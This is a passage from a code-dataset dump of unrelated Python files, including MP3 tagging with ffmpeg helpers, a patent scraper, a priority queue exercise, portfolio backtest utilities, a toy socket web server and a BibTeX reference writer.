r.json()['tracks']['items']]\r\n return r.json()['tracks']['items'][select_index]['album']['images'][0]['url']\r\n\r\n\r\ndef set_album_cover(file_path, img_path='', url='', copy_from='', title='', artist='', select_index=0):\r\n audio = MP3(file_path, ID3=mutagen.id3.ID3)\r\n filename = pathlib.Path(file_path).name\r\n try:\r\n audio.add_tags()\r\n except mutagen.id3.error:\r\n pass\r\n if title and artist:\r\n try:\r\n img_path = search_album_art(artist, title)\r\n image_data = urlopen(img_path).read()\r\n except (KeyError, ValueError, IndexError):\r\n print(f'Album cover not found for: {filename}')\r\n return False\r\n elif img_path:\r\n with open(img_path, 'rb') as bits: # better than open(albumart, 'rb').read() ?\r\n image_data = bits.read()\r\n elif url:\r\n img_path = url = url.replace(' ', '')\r\n image_data = urlopen(url).read()\r\n elif copy_from:\r\n other_audio = MP3(copy_from, ID3=mutagen.id3.ID3)\r\n try:\r\n audio['APIC:'] = other_audio['APIC:']\r\n audio.save()\r\n except KeyError:\r\n other_audio = other_audio.items()\r\n unchanged = True\r\n for k, v in other_audio:\r\n if k.startswith('APIC:'):\r\n audio['APIC:'] = v\r\n audio.save()\r\n unchanged = False\r\n if unchanged: print('That file is incompatible.')\r\n else:\r\n easy_audio = EasyID3(file_path)\r\n if 'title' in easy_audio and not title:\r\n title = easy_audio['title'][0]\r\n else:\r\n add_simple_meta(file_path)\r\n title = filename[filename.index('-') + 2:-4]\r\n if 'artist' in easy_audio and not artist:\r\n artist = easy_audio['artist'][0]\r\n else:\r\n add_simple_meta(file_path)\r\n artist = get_artist(filename)\r\n try:\r\n img_path = search_album_art(artist, title, select_index=select_index)\r\n image_data = urlopen(img_path).read()\r\n except (KeyError, ValueError, IndexError):\r\n return False\r\n\r\n if img_path.endswith('png'): mime = 'image/png'\r\n else: mime = 'image/jpeg'\r\n data = io.BytesIO(image_data)\r\n im = Image.open(data)\r\n image_data = io.BytesIO()\r\n im.save(image_data, optimize=True, format='JPEG')\r\n # image.desc = 'front cover'\r\n audio['APIC:'] = mutagen.id3.APIC(\r\n encoding=0, # 3 is for utf-8\r\n mime=mime, # image/jpeg or image/png\r\n type=3, # 3 is for the cover image\r\n # desc=u'Album Cover',\r\n data=image_data.getvalue()\r\n )\r\n audio.save()\r\n return True\r\n\r\n\r\nadd_mp3_cover = add_album_cover = set_album_cover\r\n\r\n\r\n# @memoize\r\ndef get_temp_path(filename):\r\n base = os.path.basename(filename)\r\n base = f'TEMP {base}'\r\n directory = os.path.dirname(filename)\r\n temp_path = directory + '/' + base\r\n # os.rename(filename, temp_path)\r\n return temp_path\r\n\r\n\r\ndef ffmpeg_helper(filename, command):\r\n audio = EasyID3(filename)\r\n artists = audio['artist']\r\n title = audio['title']\r\n album = audio['album']\r\n album_artist = audio['albumartist']\r\n album_cover = MP3(filename, ID3=mutagen.id3.ID3)['APIC:']\r\n temp_path = get_temp_path(filename)\r\n os.rename(filename, temp_path)\r\n os.system(command)\r\n audio = EasyID3(filename)\r\n audio['artist'] = artists\r\n audio['title'] = title\r\n audio['album'] = album\r\n audio['albumartist'] = album_artist\r\n audio.save()\r\n audio = MP3(filename, ID3=mutagen.id3.ID3)\r\n audio['APIC:'] = album_cover\r\n audio.save()\r\n os.remove(temp_path)\r\n os.remove(os.path.dirname(filename) + '/ffmpeg.log')\r\n\r\n\r\ndef trim(filename, start: int, end: int):\r\n temp_path = get_temp_path(filename)\r\n command = f'ffmpeg -i \"{temp_path}\" -ss {start} -t {end} -c copy \"{filename}\" > ffmpeg.log 2>&1'\r\n ffmpeg_helper(filename, command)\r\n\r\n\r\ndef remove_silence(filename):\r\n temp_path = get_temp_path(filename)\r\n command = f'ffmpeg -i \"{temp_path}\" -af silenceremove=start_periods=1:stop_periods=1:detection=peak \"{filename}\" ' \\\r\n f'> ffmpeg.log 2>&1'\r\n ffmpeg_helper(filename, command)\r\n\r\n\r\ndef set_genre(filename, genres=None):\r\n # requires last fm api\r\n if genres is None:\r\n easy_audio = EasyID3(filename)\r\n artist, title = easy_audio['artist'][0], easy_audio['title'][0]\r\n error_string = f'Genre not set for {artist} - {title}'\r\n artist, title = parse.quote_plus(artist), parse.quote_plus(title)\r\n url = f'https://ws.audioscrobbler.com/2.0/?method=track.getInfo&track={title}&artist={artist}&api_key={LASTFM_API}&format=json'\r\n r = requests.get(url)\r\n try: sample = r.json()['track']['toptags']['tag']\r\n except KeyError:\r\n print(error_string)\r\n return False\r\n genres = [tag['name'] for tag in sample][:3]\r\n audio = MP3(filename)\r\n audio['TCON'] = mutagen.id3.TCON(encoding=3, text=u';'.join(genres)) # genre key is TCON\r\n audio.save()\r\n return True\r\n\r\n\r\ndef get_genre(audio: MP3):\r\n return audio.get('TCON')\r\n\r\n\r\n# audio[u\"USLT::'eng'\"] = (USLT(encoding=3, lang=u'eng', desc=u'desc', text=lyrics))\r\ndef get_lyrics(audio: MP3):\r\n return audio.get(u\"USLT::'eng'\")\r\n\r\n\r\ndef remove_covers(audio: MP3):\r\n for key in audio.keys():\r\n if key.startswith('APIC'): audio.pop(key)\r\n audio.save()\r\n\r\n\r\ndef optimize_cover(audio: MP3):\r\n apic = retrieve_album_art(audio)\r\n if apic:\r\n data = apic.data\r\n data = io.BytesIO(data)\r\n im = Image.open(data)\r\n new_data = io.BytesIO()\r\n im.save(new_data, optimize=True, format='JPEG')\r\n if len(data.getvalue()) - len(new_data.getvalue()) > 0:\r\n audio['APIC:'] = mutagen.id3.APIC(\r\n encoding=0, # 3 is for utf-8\r\n mime='image/jpeg', # image/jpeg or image/png\r\n type=3, # 3 is for the cover image\r\n # desc=u'Cover',\r\n data=new_data.getvalue()\r\n )\r\n audio.save()\r\n\r\n\r\ndef fix_cover(audio: File):\r\n \"\"\"\r\n Transfers album cover from audio key APIC:XXXX to APIC:\r\n Example\r\n audio['APIC: Payday 2.jpg'] = APIC() becomes audio['APIC:'] = APIC()\r\n \"\"\"\r\n for k in audio.keys():\r\n if k.startswith('APIC:') and k != 'APIC:':\r\n audio['APIC:'] = audio.pop(k)\r\n audio.save()\r\n break\r\n\r\n\r\ndef get_bitrate(audio: File):\r\n return audio.info.bitrate\r\n \r\n\r\nif __name__ == '__main__':\r\n pass\r\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":15724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"250472723","text":"'''获取专利号'''\nfrom bs4 import BeautifulSoup\nfrom bs4 import SoupStrainer\n\nimport public_fun\n\n\nonly_a_tags = SoupStrainer(\"a\")\nonly_span_tags = SoupStrainer('span')\n\n\ndef get_patent_number(text):\n '''获取patent_number'''\n soup = BeautifulSoup(text, 'html.parser', parse_only=only_a_tags)\n aTagList = soup.find_all('a', class_='title')\n for aTag in aTagList:\n patent_number = aTag['href'].split('/')[-2]\n yield (patent_number,)\n\n\ndef get_page_num(text):\n '''获取页面数'''\n try:\n soup = BeautifulSoup(text, 'html.parser', parse_only=only_span_tags)\n span = soup.find_all('span', class_='page_link')[0]\n page_num = (span.string.strip()).split('/')[-1]\n except Exception:\n page_num = 1\n return page_num\n\n\ndef get_category_url():\n conn = public_fun.init_db('mysql')\n cur = conn.cursor()\n sql = 'select small_class from category where stat = 0'\n cur.execute(sql)\n rows = cur.fetchall()\n for row in rows:\n yield 'http://s.wanfangdata.com.cn/Patent.aspx?q=class%3a%22{}%22+%E7%94%B3%E8%AF%B7%E6%97%A5%E6%9C%9F%3a'.format(row[0])\n\n cur.close()\n conn.close()\n\n\ndef url_producer():\n '''URL生产器'''\n for cate_url in get_category_url():\n for i in range(1981, 2017):\n if i <= 1981:\n yield cate_url + '-1981&f=pateYear'\n else:\n yield cate_url + str(i) + '-' + str(i) + '&f=pateYear'\n\nif __name__ == \"__main__\":\n\n conn = public_fun.init_db('mysql')\n cur = conn.cursor()\n sql = \"INSERT IGNORE INTO `article`(patent_number) VALUES(%s);\"\n for url in url_producer():\n htm = public_fun.get_html(url)\n page_num = get_page_num(htm)\n for page in range(1, int(page_num) + 1):\n uri = url + '&p=' + str(page)\n try:\n text = public_fun.get_html(uri)\n except Exception as e:\n print(e)\n with open('bug.log', 'a') as f:\n f.write(uri + '\\n')\n continue\n data = list(get_patent_number(text))\n cur.executemany(sql, data)\n conn.commit()\n print('parse ' + uri[20:] + ' Done')\n\n cur.close()\n conn.close()\n","sub_path":"wanfangdata/get_patent_number.py","file_name":"get_patent_number.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"512596702","text":"from Statistics.Variance import findvariance\nfrom Calculator.SquareRoot import squarerootfunc\n\n\ndef findsd(value):\n\n try:\n variance = findvariance(value)\n return round(squarerootfunc(variance), 5)\n\n except ValueError:\n print(\"List is empty\")\n\n except ZeroDivisionError:\n print(\"Divide by 0 error\")","sub_path":"Statistics/StandardDeviation.py","file_name":"StandardDeviation.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"464937662","text":"from extender import *\n\n\ndef read_str_array(container, strArray):\n array_len = len(strArray)\n i = 0\n figNum = 0\n while i < array_len:\n str = strArray[i]\n key = int(str)\n if key == 1:\n i += 1\n movie = Game()\n i = movie.read_str_array(strArray, i)\n elif key == 2:\n i += 1\n movie = Cartoon()\n i = movie.read_str_array(strArray, i)\n elif key == 3:\n i += 1\n movie = Documentary()\n i = movie.read_str_array(strArray, i)\n else:\n return figNum\n if i == 0:\n return figNum\n figNum += 1\n container.store.append(movie)\n return figNum\n","sub_path":"AVS/ReadStrArray.py","file_name":"ReadStrArray.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"374347347","text":"import os\n\n\ndef readGraph(file_graph):\n\n TheGraph = open(file_graph, 'r')\n all_arcs = TheGraph.readlines()\n TheGraph.close()\n\n return all_arcs\n\n\ndef getOrigDest(all_arcs):\n\n Origine = []\n Destination = []\n for one_arc in all_arcs:\n this_arc = one_arc.split(\"\\t\")\n orig = int(this_arc[0])\n dest = int(this_arc[1].strip(\"\\n\"))\n Origine.append(orig)\n Destination.append(dest)\n\n return {'orig': Origine, 'dest': Destination}\n\n\ndef getNbArcVert(Origine, Destination):\n return {'NbArcs': len(Origine), 'NbVertices': max(max(Origine), max(Destination))+1}\n\n\n# numsucc: numero de l'arc succ\n# numprec: numero de l'arc prec\ndef getSuccPrec(Origine, Destination):\n\n infoNbArcVert = getNbArcVert(Origine, Destination)\n NbArcs = infoNbArcVert['NbArcs']\n NbVertices = infoNbArcVert['NbVertices']\n\n # la liste des successeurs de i\n # succ = new [len(NbVertices2)][] en java\n succ = [[] for i in range(NbVertices)]\n # Numero de l'arc successeur de i\n numsucc = [[] for i in range(NbVertices)]\n # Numero des arcs précedents\n numprec = [[] for i in range(NbVertices)]\n # la liste des pédécesseurs de i\n prec = [[] for i in range(NbVertices)]\n\n for u in range(0, NbArcs):\n i = Origine[u]\n j = Destination[u]\n succ[i].append(j)\n numsucc[i].append(u)\n prec[j].append(i)\n numprec[j].append(u)\n\n return {'succ': succ, 'prec': prec, 'numsucc': numsucc, 'numprec': numprec}\n\n\n# _nsucc: numero de l'arc succ\n# _nprec: numero de l'arc prec\ndef getABSuccPrec(Origine, Destination):\n\n infoNbArcVert = getNbArcVert(Origine, Destination)\n NbArcs = infoNbArcVert['NbArcs']\n NbVertices = infoNbArcVert['NbVertices']\n\n infoSuccPrec = getSuccPrec(Origine, Destination)\n succ = infoSuccPrec['succ']\n numsucc = infoSuccPrec['numsucc']\n prec = infoSuccPrec['prec']\n numprec = infoSuccPrec['numprec']\n\n _asucc = []\n _bsucc = []\n _nsucc = []\n _inds = 0\n\n for j in range(0, NbVertices):\n _asucc.append(_inds)\n _inds = _inds + len(succ[j])\n _bsucc = _bsucc + succ[j]\n _nsucc = _nsucc + numsucc[j]\n\n _asucc.append(_inds)\n\n _aprec = []\n _bprec = []\n _nprec = []\n _inds = 0\n\n for j in range(0, NbVertices):\n _aprec.append(_inds)\n _inds = _inds + len(prec[j])\n _bprec = _bprec + prec[j]\n _nprec = _nprec + numprec[j]\n _aprec.append(_inds)\n\n return {'_asucc': _asucc, '_bsucc': _bsucc, '_nsucc': _nsucc, '_aprec': _aprec, '_bprec': _bprec, '_nprec': _nprec}\n\n\ndef getOrigDestCpty(all_arcs):\n Origine = []\n Destination = []\n MaxCapacity = []\n MinCapacity = []\n for un_arc in all_arcs:\n cet_arc = un_arc.split(\"\\t\")\n orig = int(cet_arc[0])\n dest = int(cet_arc[1])\n capmin = int(cet_arc[2])\n capmax = int(cet_arc[3])\n Origine.append(orig)\n Destination.append(dest)\n MinCapacity.append(capmin)\n MaxCapacity.append(capmax)\n\n return {'orig': Origine, 'dest': Destination, 'maxCpty': MaxCapacity, 'minCpty': MinCapacity}\n\n\ndef getOrigDestCptyCost(all_arcs):\n Origine = []\n Destination = []\n MaxCapacity = []\n MinCapacity = []\n Cost = []\n\n for un_arc in all_arcs:\n cet_arc = un_arc.split(\"\\t\")\n orig = int(cet_arc[0])\n dest = int(cet_arc[1])\n capmin = int(cet_arc[2])\n capmax = int(cet_arc[3])\n cost = int(cet_arc[4])\n Origine.append(orig)\n Destination.append(dest)\n MinCapacity.append(capmin)\n MaxCapacity.append(capmax)\n Cost.append(cost)\n\n return {'orig': Origine, 'dest': Destination, 'maxCpty': MaxCapacity, 'minCpty': MinCapacity, 'cost': Cost}\n","sub_path":"Tp3/ReadGraph.py","file_name":"ReadGraph.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"568548759","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\bzETL\\util\\multithread.py\n# Compiled at: 2013-11-22 17:13:19\nimport threading\nfrom .struct import nvl\nfrom .logs import Log\nfrom .threads import Queue, Thread\nDEBUG = True\n\nclass worker_thread(threading.Thread):\n\n def __init__(self, name, in_queue, out_queue, function):\n threading.Thread.__init__(self)\n self.name = name\n self.in_queue = in_queue\n self.out_queue = out_queue\n self.function = function\n self.keep_running = True\n self.num_runs = 0\n self.start()\n\n def join(self, timeout=None):\n while self.isAlive():\n Log.note('Waiting on thread {{thread}}', {'thread': self.name})\n threading.Thread.join(self, nvl(timeout, 0.5))\n\n def run(self):\n got_stop = False\n while self.keep_running:\n request = self.in_queue.pop()\n if request == Thread.STOP:\n got_stop = True\n if self.in_queue.queue:\n Log.warning('programmer error')\n break\n if not self.keep_running:\n break\n try:\n try:\n if DEBUG and hasattr(self.function, 'func_name'):\n Log.note('run {{function}}', {'function': self.function.func_name})\n result = self.function(**request)\n if self.out_queue != None:\n self.out_queue.add({'response': result})\n except Exception as e:\n Log.warning('Can not execute with params={{params}}', {'params': request}, e)\n if self.out_queue != None:\n self.out_queue.add({'exception': e})\n\n finally:\n self.num_runs += 1\n\n self.keep_running = False\n if self.num_runs == 0:\n Log.warning('{{name}} thread did no work', {'name': self.name})\n if DEBUG and self.num_runs != 1:\n Log.note('{{name}} thread did {{num}} units of work', {'name': self.name, \n 'num': self.num_runs})\n if got_stop and self.in_queue.queue:\n Log.warning('multithread programmer error')\n if DEBUG:\n Log.note('{{thread}} DONE', {'thread': self.name})\n return\n\n def stop(self):\n self.keep_running = False\n\n\nclass Multithread(object):\n\n def __init__(self, functions):\n self.outbound = Queue()\n self.inbound = Queue()\n self.threads = []\n for t, f in enumerate(functions):\n thread = worker_thread('worker ' + unicode(t), self.inbound, self.outbound, f)\n self.threads.append(thread)\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, traceback):\n try:\n if isinstance(value, Exception):\n self.inbound.close()\n self.inbound.add(Thread.STOP)\n self.join()\n except Exception as e:\n Log.warning('Problem sending stops', e)\n\n def join(self):\n try:\n try:\n for t in self.threads:\n t.join()\n\n except (KeyboardInterrupt, SystemExit):\n Log.note('Shutdow Started, please be patient')\n except Exception as e:\n Log.error('Unusual shutdown!', e)\n\n finally:\n for t in self.threads:\n t.keep_running = False\n\n self.inbound.close()\n self.outbound.close()\n for t in self.threads:\n t.join()\n\n def execute(self, request):\n self.inbound.extend(request)\n num = len(request)\n\n def output():\n for i in xrange(num):\n result = self.outbound.pop()\n if 'exception' in result:\n raise result['exception']\n else:\n yield result['response']\n\n return output()\n\n def stop(self):\n self.inbound.close()\n for t in self.threads:\n t.keep_running = False","sub_path":"pycfiles/Bugzilla_ETL-0.3.13353-py2.7/multithread.py","file_name":"multithread.py","file_ext":"py","file_size_in_byte":4194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"456637284","text":"'''\r\nMade by Tarik S. Riadi for Computer Vision 2019-10, \r\nFacultad de Ingeniería, Universidad de los Andes.\r\n>> Make sure the original video is in the same folder as this script.\r\n>> This script will apply the Anamorphus Temporallis effect to the input video.\r\n>> Recomended max. resolution: Full HD (1920x1080) for time and memory constraints. \r\n If you wish to try a higher resolution, make sure you have proper hardware. \r\n You have been warned.\r\n>> Take note of your video's file extension. If yours differs from .mp4, please \r\n refer to the following website: http://www.fourcc.org/codecs.php \r\n'''\r\n\r\nimport cv2 #Version 4.0\r\n\r\ndef anamorphe(buffer,no_frames,resolution,tot_height,new_Vid):\r\n print('Creating new video...')\r\n for frame in range(0,no_frames-resolution):\r\n new_frame = buffer[frame] #Temporarily assign new frame\r\n for i in range(0,resolution-1): \r\n new_frame[int((tot_height/resolution)*i):int((tot_height/resolution)*(i+1))] = buffer[frame+(resolution-i)][int((tot_height/resolution)*i):int((tot_height/resolution)*(i+1))]\r\n new_Vid.write(new_frame)\r\n\r\n#---------------\r\n# Manage Input.\r\n#--------------- \r\nprint('Welcome to Anamorphe! Remember to write the video names with their corresponding file extension!') \r\nVideoName = input('Video Name: ')\r\nnew_VideoName = input('Anamorphous Video Name: ')\r\nresolution = int(input('Resolution of the effect [default=100]: '))\r\nrescale = input('Video resolution higher than 1080p? [y/n]: ')\r\n#------------------------------------\r\n# Read original video and its specs.\r\n#------------------------------------\r\nVid = cv2.VideoCapture(VideoName)\r\nbuffer = [] #List to store the frames, acting as a buffer for the anamorphe function.\r\nprint('Reading input video...')\r\ntotal_frames = int(Vid.get(cv2.CAP_PROP_FRAME_COUNT)) #Count total number of frames.\r\nframes_per_second = int(Vid.get(cv2.CAP_PROP_FPS)) #fps of original video.\r\nwidth, height = int(Vid.get(3)), int(Vid.get(4))\r\nfor i in range(0,total_frames):\r\n ret, frame = Vid.read()\r\n if rescale == 'y': #Rescale if video's resolution is greater than FullHD.\r\n if i == 0:\r\n print('Rescaling...')\r\n frame2 = cv2.resize(frame,(1920,1080),fx=0,fy=0,interpolation=cv2.INTER_CUBIC) #Resize resolution to HD.\r\n buffer.append(frame2)\r\n else:\r\n buffer.append(frame)\r\n \r\nVid.release() #Stop reading video.\r\n#-------------------\r\n# Create new video.\r\n#-------------------\r\nfourcc = cv2.VideoWriter_fourcc(*'MP4V') #http://www.fourcc.org/codecs.php\r\nnew_Vid = cv2.VideoWriter(new_VideoName, fourcc, frames_per_second, (1920,1080))\r\nanamorphe(buffer, total_frames, resolution, height, new_Vid) #Create the effect on video.\r\n#-----------------------------------------------\r\n# Delete unecessary variables and close videos.\r\n#-----------------------------------------------\r\nprint('Finishing...')\r\ndel buffer, fourcc, resolution\r\nnew_Vid.release()\r\ncv2.destroyAllWindows() #Close Preview window.\r\nprint('All Done!') \r\n ","sub_path":"Tarea1_Riadi.py","file_name":"Tarea1_Riadi.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"503082565","text":"# Creating a node\r\n\r\nclass Node:\r\n def __init__(self, key, priority):\r\n self.key = key\r\n self.priority = priority\r\n llink=None\r\n rlink=None\r\n\r\n #\r\n\r\n\r\nclass PiorityQueue:\r\n\r\n def __init__(self):\r\n # Initializting Empty queue\r\n self.queue = []\r\n\r\n def Insert(self, key, priority):\r\n n = Node(key, priority)# for adding a value\r\n l = len(self.queue)\r\n# Checking if the queue is empty\r\n if len(self.queue) == 0:\r\n self.queue.append(n)\r\n\r\n else:\r\n i = 1\r\n if self.queue[0].priority > priority:\r\n self.queue.insert(0, n)\r\n\r\n else:\r\n while(i < l and self.queue[i].priority <= priority):\r\n i+=1\r\n\r\n self.queue.insert(i, n)\r\n# Changes the piority of the element\r\n def Update(self, key, newPriority):\r\n for i in self.queue:\r\n if i.key == key:\r\n print(\"Changed priority of \" + \"(\" + str(i.key) + \",\" + str(i.priority) + \") to \" + str(newPriority))\r\n i.priority = newPriority\r\n return\r\n \r\n print(\"Node not found\")\r\n # deletes a value \r\n def Delete(self,key):\r\n for i in range(len(self.queue)):\r\n if(self.queue[i].key == key):\r\n del self.queue[i]\r\n print(\"Deleted node\")\r\n return\r\n # if value is not in the queue\r\n print(\"Node not found\")\r\n# for showing the queue\r\n def Print(self):\r\n for i in self.queue:\r\n print(\"[\" + str(i.key) + \",\" + str(i.priority) + \"]\" + \"->\", end=\"\")\r\n \r\n print(\"\\n\")\r\n# Give the element having minimum piority\r\n def Min(self):\r\n min = self.queue[0]\r\n for i in range(len(self.queue)):\r\n if self.queue[i].priority < min.priority:\r\n min = self.queue[i]\r\n\r\n print(\"Minimum node ny priority: \")\r\n print(min.key,\",\",min.priority)\r\n# return the size of the qeue\r\n def size(self):\r\n return len(self.queue)\r\n# Rlink is right most node\r\n#Llink is the left most node\r\n def RLink_LLink(self):\r\n if len(self.queue) == 0:\r\n return None, None\r\n \r\n else:\r\n return self.queue[0], self.queue[-1]\r\n\r\n\r\n \r\n\r\n# merges two queues\r\n def union(self,Q1,Q2):\r\n n1 = Q1.size() # node of Queue 1\r\n n2 = Q2.size() # node of Queue 2\r\n\r\n n3 = n1+n2 # adding two nodes\r\n res=0 # resultant output\r\n\r\n res = PiorityQueue()\r\n # checking which queue is smaller\r\n if n1 > n2:\r\n res.queue = Q1.queue + Q2.queue\r\n\r\n else:\r\n res.queue = Q2.queue + Q1.queue\r\n\r\n return res.Print() #final output\r\n \r\n\r\n\r\n# Driver Code\r\nif __name__ == \"__main__\":\r\n # creating 2 queues\r\n q1 = PiorityQueue()\r\n q2 = PiorityQueue()\r\n\r\n print(\"----------------------------------Queue 1-------------------------------------------------------\")\r\n q1.Insert(0,1)\r\n q1.Insert(0,2)\r\n q1.Insert(1,1)\r\n q1.Update(1,0)\r\n q1.Min()\r\n q1.Print()\r\n print(\"----------------------------------Queue 2-------------------------------------------------------\")\r\n\r\n q2.Insert(5,1)\r\n q2.Insert(4,2)\r\n q2.Insert(7,3)\r\n q2.Insert(5,4)\r\n q2.Delete(8)\r\n\r\n\r\n q2.Print()\r\n print(\"The Union is\")\r\n q1.union(q1,q2)\r\n\r\n ","sub_path":"19b-003-cs.py","file_name":"19b-003-cs.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"401850379","text":"import pandas as pd\n\n\ndef divide_code_list_by_quantiles(asset_series: pd.Series, quantiles: int, target_tile: int) -> tuple:\n counts_per_division = len(asset_series) / quantiles\n counts_per_division = int(counts_per_division)\n\n tile = target_tile\n\n reversed_asset_series = asset_series.sort_values(ascending=False)\n\n first_quantile = asset_series.index.to_list()[counts_per_division * tile: counts_per_division * (tile + 1)]\n last_quantile = reversed_asset_series.index.to_list()[counts_per_division * tile: counts_per_division * (tile + 1)]\n return first_quantile, last_quantile\n\n\ndef apply_equal_weights(code_list: list, for_short=False, exposure=1) -> dict:\n total_weight = -exposure if for_short else exposure\n if len(code_list) == 0:\n weights = {}\n else:\n weights = {}\n weight_per_stock = total_weight / len(code_list)\n for ticker in code_list:\n weights[ticker] = weight_per_stock\n return weights\n\n\ndef get_intersect_code_list(one: list, another: list) -> list:\n return list(set(one).intersection(set(another)))\n\n\ndef get_no_rebalancing_port_daily_value_df(weight_series: pd.Series, daily_return_df: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n 리밸런싱이 없는 포트폴리오 자산 value\n 시작 value 는 합산 1\n \"\"\"\n assert weight_series.sum() == 1\n initial_value_series = weight_series\n daily_value_df = daily_return_df.add(1).cumprod().multiply(initial_value_series)\n return daily_value_df\n\n\ndef get_static_weight_rebalancing_port_daily_value_df(weight_series: pd.Series,\n daily_return_df: pd.DataFrame,\n rebalancing_date_list: list) -> pd.DataFrame:\n \"\"\"\n 리밸런싱이 반영된 포트폴리오 자산 value\n weight_series 의 index 와 daily_return_df column 이 일치해야함.\n for 문 없앨수 없나??..\n 리밸런싱 날의 종가에 매도, 매수 모두 이루어진다고 가정.\n \"\"\"\n\n port_value_df = pd.DataFrame()\n\n new_rebalancing_date_list = [*rebalancing_date_list]\n if new_rebalancing_date_list[-1] != daily_return_df.index[-1].strftime(\"%Y-%m-%d\"):\n new_rebalancing_date_list.append(daily_return_df.index[-1].strftime(\"%Y-%m-%d\"))\n\n for i, date in enumerate(new_rebalancing_date_list):\n if i == 0:\n start_date = daily_return_df.index[0].strftime(\"%Y-%m-%d\")\n end_date = date\n previous_value_series = weight_series\n date_range = (daily_return_df.index >= start_date) & (daily_return_df.index <= end_date)\n else:\n start_date = new_rebalancing_date_list[i - 1]\n end_date = date\n previous_value_series = weight_series * port_value_df.iloc[-1].sum()\n date_range = (daily_return_df.index > start_date) & (daily_return_df.index <= end_date)\n sliced_daily_return_df = daily_return_df.loc[date_range]\n sliced_value_df = sliced_daily_return_df.add(1).cumprod().multiply(previous_value_series)\n port_value_df = pd.concat([port_value_df, sliced_value_df], axis=0)\n return port_value_df\n\n\ndef get_dynamic_weight_rebalancing_port_daily_value_df(weight_series_list: list,\n daily_return_df: pd.DataFrame,\n rebalancing_date_list: list) -> pd.DataFrame:\n \"\"\"\n weight_eries_list 의 첫 항목은 최조 비중\n 리밸런싱 날의 종가에 매도, 매수 모두 이루어진다고 가정.\n \"\"\"\n assert len(weight_series_list) == len(rebalancing_date_list) + 1\n\n port_value_df = pd.DataFrame()\n\n new_rebalancing_date_list = [*rebalancing_date_list]\n if new_rebalancing_date_list[-1] != daily_return_df.index[-1].strftime(\"%Y-%m-%d\"):\n new_rebalancing_date_list.append(daily_return_df.index[-1].strftime(\"%Y-%m-%d\"))\n\n sliced_value_df_list = []\n for i, date in enumerate(new_rebalancing_date_list):\n print(date)\n if i == 0:\n start_date = daily_return_df.index[0].strftime(\"%Y-%m-%d\")\n end_date = date\n previous_value_series = weight_series_list[i]\n date_range = (daily_return_df.index >= start_date) & (daily_return_df.index <= end_date)\n else:\n start_date = rebalancing_date_list[i - 1]\n end_date = date\n # previous_value_series = weight_series_list[i] * port_value_df.iloc[-1].sum()\n previous_value_series = weight_series_list[i] * sliced_value_df_list[-1].iloc[-1].sum()\n date_range = (daily_return_df.index > start_date) & (daily_return_df.index <= end_date)\n sliced_daily_return_df = daily_return_df.loc[date_range]\n sliced_value_df = sliced_daily_return_df.add(1).cumprod().multiply(previous_value_series)\n sliced_value_df_list.append(sliced_value_df)\n port_value_df = pd.concat([*sliced_value_df_list], axis=0)\n return port_value_df\n","sub_path":"quantrading/backtest/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"242126673","text":"import socket\nimport time\n\nserver = socket.socket()\nserver.bind((\"127.0.0.1\",9999))\nserver.listen()\n\nwhile 1:\n conn,addr = server.accept()\n while 1:\n from_b_data = conn.recv(1024)\n print(from_b_data.decode(\"utf-8\"))\n data_heard = b\"HTTP/1.1 200 ok\\r\\n\\r\\n\"\n conn.send(data_heard)\n with open(\"test01.html\",mode=\"r\",encoding=\"utf-8\") as f:\n data = f.read().replace(\"__time__\",str(time.time()))\n conn.send(data.encode(\"utf-8\"))\n conn.close()\n\nserver.close()\n\n\n\n","sub_path":"前端/socket_server.py","file_name":"socket_server.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"208813244","text":"'''\nConversion of references to bibtex format\n'''\n\nfrom ..misc import compact_elements\n\n\ndef _ref_bib(key, ref):\n '''Convert a single reference to bibtex format\n '''\n s = u''\n\n s += u'@{}{{{},\\n'.format(ref['type'], key)\n\n entry_lines = []\n for k, v in ref.items():\n if k == 'type':\n continue\n\n # Handle authors/editors\n if k == 'authors':\n entry_lines.append(u' author = {{{}}}'.format(' and '.join(v)))\n elif k == 'editors':\n entry_lines.append(u' editor = {{{}}}'.format(' and '.join(v)))\n else:\n entry_lines.append(u' {} = {{{}}}'.format(k, v))\n\n s += ',\\n'.join(entry_lines)\n s += '\\n}'\n\n return s\n\n\ndef write_bib(refs):\n '''Converts references to bibtex\n '''\n\n full_str = u''\n\n # First, write out the element, description -> key mapping\n # Also make a dict of unique reference to output\n unique_refs = {}\n\n for ref in refs:\n full_str += u'% {}\\n'.format(compact_elements(ref['elements']))\n\n for ri in ref['reference_info']:\n full_str += u'% {}\\n'.format(ri['reference_description'])\n\n refdata = ri['reference_data']\n\n if len(refdata) == 0:\n full_str += u'% (...no reference...)\\n%\\n'\n else:\n full_str += u'% {}\\n%\\n'.format(' '.join(ri['reference_keys']))\n\n for k, r in refdata.items():\n unique_refs[k] = r\n\n full_str += u'\\n\\n'\n\n # Go through them sorted alphabetically by key\n for k, r in sorted(unique_refs.items(), key=lambda x: 